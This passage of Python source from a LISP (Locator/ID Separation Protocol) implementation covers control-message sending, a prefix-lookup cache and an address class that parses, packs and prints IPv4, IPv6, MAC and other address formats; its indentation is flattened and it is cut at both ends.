lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if NAT-traversal is configured, use the same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
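#
# byte_swap_64_sketch
#
# Illustrative sketch only -- not called anywhere in this file. It shows
# the expected behavior of byte_swap_64(): a known pattern reverses byte
# order, and swapping twice returns the original value.
#
def byte_swap_64_sketch():
    value = 0x0102030405060708
    swapped = byte_swap_64(value)
    assert swapped == 0x0807060504030201
    assert byte_swap_64(swapped) == value
    return(True)
#enddef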
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
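#
# lisp_cache_usage_sketch
#
# Illustrative sketch only -- not called anywhere in this file. It shows
# how a lisp_cache() is populated and searched with an exact-match lookup.
# The key is built from <instance-id><afi><address> in hex as described
# above. Longest-match lookups (exact=False) also require entries that
# carry an .eid attribute, like the lisp_mapping() entries stored in
# lisp_map_cache. Uses class lisp_address() defined later in this file;
# Python resolves the name when the function is called, not when defined.
#
def lisp_cache_usage_sketch():
    cache = lisp_cache()
    prefix = lisp_address(LISP_AFI_NONE, "", 0, 0)
    prefix.store_prefix("[0]10.0.0.0/8")
    cache.add_cache(prefix, "example-entry")
    assert cache.cache_size() == 1
    return(cache.lookup_cache(prefix, True))
#enddef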
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the returned entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a Python peculiarity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because "L" can produce
# 8 bytes in struct.pack() on 64-bit systems.
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There is a common IPv6 address input mistake that can occur. The
# address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow the user to specify ff::/8, which places the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
